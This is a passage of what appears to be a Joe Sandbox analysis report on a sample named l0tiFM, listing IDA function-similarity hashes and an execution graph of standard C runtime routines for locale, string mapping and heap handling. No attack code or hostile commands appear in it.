                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __except_validate_context_record
                                                                                                                • String ID: csm$csm
                                                                                                                • API String ID: 1467352782-3733052814
                                                                                                                • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                                                                                • Instruction ID: 6a6fe900e328f622ca646d5f10fb0187f6ca9576bd3fd161c0433466bdc761ca
                                                                                                                • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                                                                                • Instruction Fuzzy Hash: ED7183B250C68186DF60AF35D484B7E7BA0FB04B84F688136DE8C6BA89CB3CD459C744
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                • String ID: csm
                                                                                                                • API String ID: 2558813199-1018135373
                                                                                                                • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                                                                                • Instruction ID: 7100c86260c25f067104827c3bdd9f4bcb5c84eed2f601bcd04d953338ea06f4
                                                                                                                • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                                                                                • Instruction Fuzzy Hash: B15162B261874196DA20FF25E080A6E77A4FB89B90F980134EB8D1BB55CF3CE465CB00
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                • String ID: U
                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                                                                                • Instruction ID: 08781e5ee7fbf188fe9f3d7044082d468bb2cdb0a6998a669b7902f3765ae6e6
                                                                                                                • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                                                                                • Instruction Fuzzy Hash: 4741B2B2A19A4181DF20EF75E4447AA77A0FB88794F884131EE4E9B794DF3CD445CB40
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionRaise
                                                                                                                • String ID: csm
                                                                                                                • API String ID: 3997070919-1018135373
                                                                                                                • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                                                                                • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                                                                                                • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                                                                                • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00007FFBC3203A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFBC3203A63
                                                                                                                • __GSHandlerCheckCommon.LIBCMT ref: 00007FFBC3210993
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CheckCommonHandler__except_validate_context_record
                                                                                                                • String ID: csm$f
                                                                                                                • API String ID: 1543384424-629598281
                                                                                                                • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                                                                                • Instruction ID: d1f53d47c39e8afceb262e2fd35fa0d2909f5c2b02845ddf3923135eccfc676f
                                                                                                                • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                                                                                • Instruction Fuzzy Hash: A211AF72A1878585EB50AF32E5819AAB764EB45FC4F8C8035EF882FB56CE38D851C700
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: TimerWaitable
                                                                                                                • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                                                                                • API String ID: 1823812067-484248852
                                                                                                                • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                                                                                • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                                                                                                • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                                                                                • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                                                                                                APIs
                                                                                                                • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFBC320112F), ref: 00007FFBC32039E0
                                                                                                                • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFBC320112F), ref: 00007FFBC3203A21
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                • String ID: csm
                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                                                                                • Instruction ID: 8794dc55e629af33f632151be59851f87d6bb74f3517eeb7756924e450a3536b
                                                                                                                • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                                                                                • Instruction Fuzzy Hash: 61115E72618B4582EB209F25E44066A77E4FB88B84F984230EFCD1BB58DF3CD555CB00
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: TimerWaitable
                                                                                                                • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                                                                                • API String ID: 1823812067-3336177065
                                                                                                                • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                                                                                • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                                                                                                • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                                                                                • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859560861-0
                                                                                                                • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                                                                                • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                                                                                                • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                                                                                • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:5.9%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:1.3%
                                                                                                                Total number of Nodes:1047
                                                                                                                Total number of Limit Nodes:29
3873 842c72 strtoxl 66 API calls 3871->3873 3872->3858 3872->3861 3873->3863 3874->3847 3874->3850 3874->3861 3874->3862 3874->3865 3874->3866 3874->3867 3874->3868 3874->3869 3874->3871 3875 844614 VirtualFree VirtualFree HeapFree ___sbh_free_block 3874->3875 3876 8457e1 3874->3876 3875->3874 3879 8429c6 LeaveCriticalSection 3876->3879 3878 8457e8 3878->3874 3879->3878 3883 8429c6 LeaveCriticalSection 3880->3883 3882 84148d 3882->3793 3883->3882 3885 841561 __freefls@4 3884->3885 3886 842aa0 __lock 66 API calls 3885->3886 3887 841568 3886->3887 3888 841631 __initterm 3887->3888 3890 841594 3887->3890 3903 84166c 3888->3903 3892 8420f9 __decode_pointer 6 API calls 3890->3892 3894 84159f 3892->3894 3893 841669 __freefls@4 3893->3360 3896 841621 __initterm 3894->3896 3898 8420f9 __decode_pointer 6 API calls 3894->3898 3896->3888 3897 841660 3899 841465 _fast_error_exit 3 API calls 3897->3899 3902 8415b4 3898->3902 3899->3893 3900 8420f9 6 API calls __decode_pointer 3900->3902 3901 8420f0 6 API calls __init_pointers 3901->3902 3902->3896 3902->3900 3902->3901 3904 841672 3903->3904 3906 84164d 3903->3906 3908 8429c6 LeaveCriticalSection 3904->3908 3906->3893 3907 8429c6 LeaveCriticalSection 3906->3907 3907->3897 3908->3906 4017 844247 4027 8441cb 4017->4027 4020 844272 setSBCS 4021 8410cc __except_handler4 5 API calls 4020->4021 4022 84442a 4021->4022 4023 8442b6 IsValidCodePage 4023->4020 4024 8442c8 GetCPInfo 4023->4024 4024->4020 4025 8442db __setmbcp_nolock 4024->4025 4034 843f0d GetCPInfo 4025->4034 4044 844144 4027->4044 4030 844208 4032 84420d GetACP 4030->4032 4033 8441fa 4030->4033 4031 8441ea GetOEMCP 4031->4033 4032->4033 4033->4020 4033->4023 4033->4025 4035 843ff3 4034->4035 4038 843f41 __setmbcp_nolock 4034->4038 4040 8410cc __except_handler4 5 API calls 4035->4040 4255 845fe2 4038->4255 4042 84409e 4040->4042 4042->4025 4043 846415 ___crtLCMapStringA 101 API calls 4043->4035 4045 844157 4044->4045 4051 8441a4 4044->4051 4046 842345 __getptd 66 API calls 
4045->4046 4047 84415c 4046->4047 4048 844184 4047->4048 4052 843e04 4047->4052 4048->4051 4067 8440a0 4048->4067 4051->4030 4051->4031 4053 843e10 __freefls@4 4052->4053 4054 842345 __getptd 66 API calls 4053->4054 4055 843e15 4054->4055 4056 843e43 4055->4056 4058 843e27 4055->4058 4057 842aa0 __lock 66 API calls 4056->4057 4059 843e4a 4057->4059 4060 842345 __getptd 66 API calls 4058->4060 4083 843dc6 4059->4083 4062 843e2c 4060->4062 4065 843e3a __freefls@4 4062->4065 4066 841411 __amsg_exit 66 API calls 4062->4066 4065->4048 4066->4065 4068 8440ac __freefls@4 4067->4068 4069 842345 __getptd 66 API calls 4068->4069 4070 8440b1 4069->4070 4071 842aa0 __lock 66 API calls 4070->4071 4074 8440c3 4070->4074 4072 8440e1 4071->4072 4075 84412a 4072->4075 4078 844112 InterlockedIncrement 4072->4078 4079 8440f8 InterlockedDecrement 4072->4079 4073 8440d1 __freefls@4 4073->4051 4074->4073 4076 841411 __amsg_exit 66 API calls 4074->4076 4251 84413b 4075->4251 4076->4073 4078->4075 4079->4078 4080 844103 4079->4080 4080->4078 4081 8435ee ___free_lconv_mon 66 API calls 4080->4081 4082 844111 4081->4082 4082->4078 4084 843dca 4083->4084 4085 843dfc 4083->4085 4084->4085 4086 843c9e ___addlocaleref 8 API calls 4084->4086 4091 843e6e 4085->4091 4087 843ddd 4086->4087 4087->4085 4094 843d2d 4087->4094 4250 8429c6 LeaveCriticalSection 4091->4250 4093 843e75 4093->4062 4095 843dc1 4094->4095 4096 843d3e InterlockedDecrement 4094->4096 4095->4085 4108 843b55 4095->4108 4097 843d56 4096->4097 4098 843d53 InterlockedDecrement 4096->4098 4099 843d60 InterlockedDecrement 4097->4099 4100 843d63 4097->4100 4098->4097 4099->4100 4101 843d70 4100->4101 4102 843d6d InterlockedDecrement 4100->4102 4103 843d7a InterlockedDecrement 4101->4103 4105 843d7d 4101->4105 4102->4101 4103->4105 4104 843d96 InterlockedDecrement 4104->4105 4105->4104 4106 843da6 InterlockedDecrement 4105->4106 4107 843db1 InterlockedDecrement 4105->4107 4106->4105 4107->4095 4109 843bd9 4108->4109 4115 843b6c 
4108->4115 4110 8435ee ___free_lconv_mon 66 API calls 4109->4110 4111 843c26 4109->4111 4112 843bfa 4110->4112 4124 843c4d 4111->4124 4162 845ae1 4111->4162 4116 8435ee ___free_lconv_mon 66 API calls 4112->4116 4115->4109 4118 843ba0 4115->4118 4120 8435ee ___free_lconv_mon 66 API calls 4115->4120 4122 843c0d 4116->4122 4117 843bc1 4123 8435ee ___free_lconv_mon 66 API calls 4117->4123 4118->4117 4129 8435ee ___free_lconv_mon 66 API calls 4118->4129 4119 8435ee ___free_lconv_mon 66 API calls 4119->4124 4125 843b95 4120->4125 4121 843c92 4126 8435ee ___free_lconv_mon 66 API calls 4121->4126 4127 8435ee ___free_lconv_mon 66 API calls 4122->4127 4130 843bce 4123->4130 4124->4121 4128 8435ee 66 API calls ___free_lconv_mon 4124->4128 4138 845cbb 4125->4138 4132 843c98 4126->4132 4133 843c1b 4127->4133 4128->4124 4134 843bb6 4129->4134 4135 8435ee ___free_lconv_mon 66 API calls 4130->4135 4132->4085 4136 8435ee ___free_lconv_mon 66 API calls 4133->4136 4154 845c76 4134->4154 4135->4109 4136->4111 4139 845cc8 4138->4139 4153 845d45 4138->4153 4141 8435ee ___free_lconv_mon 66 API calls 4139->4141 4144 845cd9 4139->4144 4140 845ceb 4143 845cfd 4140->4143 4145 8435ee ___free_lconv_mon 66 API calls 4140->4145 4141->4144 4142 8435ee ___free_lconv_mon 66 API calls 4142->4140 4146 845d0f 4143->4146 4147 8435ee ___free_lconv_mon 66 API calls 4143->4147 4144->4140 4144->4142 4145->4143 4148 845d21 4146->4148 4150 8435ee ___free_lconv_mon 66 API calls 4146->4150 4147->4146 4149 845d33 4148->4149 4151 8435ee ___free_lconv_mon 66 API calls 4148->4151 4152 8435ee ___free_lconv_mon 66 API calls 4149->4152 4149->4153 4150->4148 4151->4149 4152->4153 4153->4118 4155 845c83 4154->4155 4161 845cb7 4154->4161 4156 8435ee ___free_lconv_mon 66 API calls 4155->4156 4158 845c93 4155->4158 4156->4158 4157 845ca5 4160 8435ee ___free_lconv_mon 66 API calls 4157->4160 4157->4161 4158->4157 4159 8435ee ___free_lconv_mon 66 API calls 4158->4159 4159->4157 4160->4161 4161->4117 4163 845af2 4162->4163 
4164 843c46 4162->4164 4165 8435ee ___free_lconv_mon 66 API calls 4163->4165 4164->4119 4166 845afa 4165->4166 4167 8435ee ___free_lconv_mon 66 API calls 4166->4167 4168 845b02 4167->4168 4169 8435ee ___free_lconv_mon 66 API calls 4168->4169 4170 845b0a 4169->4170 4171 8435ee ___free_lconv_mon 66 API calls 4170->4171 4172 845b12 4171->4172 4173 8435ee ___free_lconv_mon 66 API calls 4172->4173 4174 845b1a 4173->4174 4175 8435ee ___free_lconv_mon 66 API calls 4174->4175 4176 845b22 4175->4176 4177 8435ee ___free_lconv_mon 66 API calls 4176->4177 4178 845b29 4177->4178 4179 8435ee ___free_lconv_mon 66 API calls 4178->4179 4180 845b31 4179->4180 4181 8435ee ___free_lconv_mon 66 API calls 4180->4181 4182 845b39 4181->4182 4183 8435ee ___free_lconv_mon 66 API calls 4182->4183 4184 845b41 4183->4184 4185 8435ee ___free_lconv_mon 66 API calls 4184->4185 4186 845b49 4185->4186 4187 8435ee ___free_lconv_mon 66 API calls 4186->4187 4188 845b51 4187->4188 4189 8435ee ___free_lconv_mon 66 API calls 4188->4189 4190 845b59 4189->4190 4191 8435ee ___free_lconv_mon 66 API calls 4190->4191 4192 845b61 4191->4192 4193 8435ee ___free_lconv_mon 66 API calls 4192->4193 4194 845b69 4193->4194 4195 8435ee ___free_lconv_mon 66 API calls 4194->4195 4196 845b71 4195->4196 4197 8435ee ___free_lconv_mon 66 API calls 4196->4197 4198 845b7c 4197->4198 4199 8435ee ___free_lconv_mon 66 API calls 4198->4199 4200 845b84 4199->4200 4201 8435ee ___free_lconv_mon 66 API calls 4200->4201 4202 845b8c 4201->4202 4203 8435ee ___free_lconv_mon 66 API calls 4202->4203 4204 845b94 4203->4204 4205 8435ee ___free_lconv_mon 66 API calls 4204->4205 4206 845b9c 4205->4206 4207 8435ee ___free_lconv_mon 66 API calls 4206->4207 4208 845ba4 4207->4208 4209 8435ee ___free_lconv_mon 66 API calls 4208->4209 4210 845bac 4209->4210 4211 8435ee ___free_lconv_mon 66 API calls 4210->4211 4212 845bb4 4211->4212 4213 8435ee ___free_lconv_mon 66 API calls 4212->4213 4214 845bbc 4213->4214 4215 8435ee ___free_lconv_mon 66 API 
calls 4214->4215 4216 845bc4 4215->4216 4217 8435ee ___free_lconv_mon 66 API calls 4216->4217 4218 845bcc 4217->4218 4219 8435ee ___free_lconv_mon 66 API calls 4218->4219 4220 845bd4 4219->4220 4221 8435ee ___free_lconv_mon 66 API calls 4220->4221 4222 845bdc 4221->4222 4223 8435ee ___free_lconv_mon 66 API calls 4222->4223 4224 845be4 4223->4224 4225 8435ee ___free_lconv_mon 66 API calls 4224->4225 4226 845bec 4225->4226 4227 8435ee ___free_lconv_mon 66 API calls 4226->4227 4228 845bf4 4227->4228 4229 8435ee ___free_lconv_mon 66 API calls 4228->4229 4230 845c02 4229->4230 4231 8435ee ___free_lconv_mon 66 API calls 4230->4231 4232 845c0d 4231->4232 4233 8435ee ___free_lconv_mon 66 API calls 4232->4233 4234 845c18 4233->4234 4235 8435ee ___free_lconv_mon 66 API calls 4234->4235 4236 845c23 4235->4236 4237 8435ee ___free_lconv_mon 66 API calls 4236->4237 4238 845c2e 4237->4238 4239 8435ee ___free_lconv_mon 66 API calls 4238->4239 4240 845c39 4239->4240 4241 8435ee ___free_lconv_mon 66 API calls 4240->4241 4242 845c44 4241->4242 4243 8435ee ___free_lconv_mon 66 API calls 4242->4243 4244 845c4f 4243->4244 4245 8435ee ___free_lconv_mon 66 API calls 4244->4245 4246 845c5a 4245->4246 4247 8435ee ___free_lconv_mon 66 API calls 4246->4247 4248 845c65 4247->4248 4249 8435ee ___free_lconv_mon 66 API calls 4248->4249 4249->4164 4250->4093 4254 8429c6 LeaveCriticalSection 4251->4254 4253 844142 4253->4074 4254->4253 4256 844144 _LocaleUpdate::_LocaleUpdate 76 API calls 4255->4256 4257 845ff5 4256->4257 4265 845e28 4257->4265 4260 846415 4261 844144 _LocaleUpdate::_LocaleUpdate 76 API calls 4260->4261 4262 846428 4261->4262 4353 846070 4262->4353 4266 845e74 4265->4266 4267 845e49 GetStringTypeW 4265->4267 4268 845e61 4266->4268 4270 845f5b 4266->4270 4267->4268 4269 845e69 GetLastError 4267->4269 4271 845ead MultiByteToWideChar 4268->4271 4282 845f55 4268->4282 4269->4266 4293 846b1a GetLocaleInfoA 4270->4293 4278 845eda 4271->4278 4271->4282 4273 8410cc __except_handler4 5 API 
calls 4276 843fae 4273->4276 4275 845eef __alloca_probe_16 __setmbcp_nolock 4280 845f28 MultiByteToWideChar 4275->4280 4275->4282 4276->4260 4277 845fac GetStringTypeA 4281 845fc7 4277->4281 4277->4282 4278->4275 4283 8454b5 _malloc 66 API calls 4278->4283 4285 845f3e GetStringTypeW 4280->4285 4286 845f4f 4280->4286 4287 8435ee ___free_lconv_mon 66 API calls 4281->4287 4282->4273 4283->4275 4285->4286 4289 845446 4286->4289 4287->4282 4290 845463 4289->4290 4291 845452 4289->4291 4290->4282 4291->4290 4292 8435ee ___free_lconv_mon 66 API calls 4291->4292 4292->4290 4294 846b4d 4293->4294 4296 846b48 4293->4296 4324 846b04 4294->4324 4297 8410cc __except_handler4 5 API calls 4296->4297 4298 845f7f 4297->4298 4298->4277 4298->4282 4299 846b63 4298->4299 4300 846ba3 GetCPInfo 4299->4300 4316 846c2d 4299->4316 4301 846c18 MultiByteToWideChar 4300->4301 4302 846bba 4300->4302 4307 846bd3 _strlen 4301->4307 4301->4316 4302->4301 4304 846bc0 GetCPInfo 4302->4304 4303 8410cc __except_handler4 5 API calls 4305 845fa0 4303->4305 4304->4301 4306 846bcd 4304->4306 4305->4277 4305->4282 4306->4301 4306->4307 4308 8454b5 _malloc 66 API calls 4307->4308 4312 846c05 __alloca_probe_16 __setmbcp_nolock 4307->4312 4308->4312 4309 846c62 MultiByteToWideChar 4310 846c99 4309->4310 4311 846c7a 4309->4311 4313 845446 __freea 66 API calls 4310->4313 4314 846c81 WideCharToMultiByte 4311->4314 4315 846c9e 4311->4315 4312->4309 4312->4316 4313->4316 4314->4310 4317 846cbd 4315->4317 4318 846ca9 WideCharToMultiByte 4315->4318 4316->4303 4319 843730 __calloc_crt 66 API calls 4317->4319 4318->4310 4318->4317 4320 846cc5 4319->4320 4320->4310 4321 846cce WideCharToMultiByte 4320->4321 4321->4310 4322 846ce0 4321->4322 4323 8435ee ___free_lconv_mon 66 API calls 4322->4323 4323->4310 4327 846f7a 4324->4327 4328 846f93 4327->4328 4331 846d4b 4328->4331 4332 844144 _LocaleUpdate::_LocaleUpdate 76 API calls 4331->4332 4334 846d60 4332->4334 4333 846d72 4335 842c72 strtoxl 66 API calls 4333->4335 
4334->4333 4339 846daf 4334->4339 4336 846d77 4335->4336 4337 842c0a strtoxl 6 API calls 4336->4337 4342 846b15 4337->4342 4340 846df4 4339->4340 4343 8469e5 4339->4343 4341 842c72 strtoxl 66 API calls 4340->4341 4340->4342 4341->4342 4342->4296 4344 844144 _LocaleUpdate::_LocaleUpdate 76 API calls 4343->4344 4345 8469f9 4344->4345 4349 846a06 4345->4349 4350 846acc 4345->4350 4348 845fe2 ___crtGetStringTypeA 90 API calls 4348->4349 4349->4339 4351 844144 _LocaleUpdate::_LocaleUpdate 76 API calls 4350->4351 4352 846a2e 4351->4352 4352->4348 4354 846091 LCMapStringW 4353->4354 4357 8460ac 4353->4357 4355 8460b4 GetLastError 4354->4355 4354->4357 4355->4357 4356 8462aa 4358 846b1a ___ansicp 90 API calls 4356->4358 4357->4356 4359 846106 4357->4359 4362 8462d2 4358->4362 4360 84611f MultiByteToWideChar 4359->4360 4383 8462a1 4359->4383 4367 84614c 4360->4367 4360->4383 4361 8410cc __except_handler4 5 API calls 4363 843fce 4361->4363 4364 8463c6 LCMapStringA 4362->4364 4365 8462eb 4362->4365 4362->4383 4363->4043 4368 846322 4364->4368 4369 846b63 ___convertcp 73 API calls 4365->4369 4366 84619d MultiByteToWideChar 4370 8461b6 LCMapStringW 4366->4370 4371 846298 4366->4371 4373 8454b5 _malloc 66 API calls 4367->4373 4380 846165 __alloca_probe_16 4367->4380 4372 8463ed 4368->4372 4376 8435ee ___free_lconv_mon 66 API calls 4368->4376 4374 8462fd 4369->4374 4370->4371 4375 8461d7 4370->4375 4378 845446 __freea 66 API calls 4371->4378 4381 8435ee ___free_lconv_mon 66 API calls 4372->4381 4372->4383 4373->4380 4377 846307 LCMapStringA 4374->4377 4374->4383 4379 8461e0 4375->4379 4386 846209 4375->4386 4376->4372 4377->4368 4384 846329 4377->4384 4378->4383 4379->4371 4382 8461f2 LCMapStringW 4379->4382 4380->4366 4380->4383 4381->4383 4382->4371 4383->4361 4387 84633a __alloca_probe_16 __setmbcp_nolock 4384->4387 4388 8454b5 _malloc 66 API calls 4384->4388 4385 846258 LCMapStringW 4389 846270 WideCharToMultiByte 4385->4389 4390 846292 4385->4390 4391 846224 
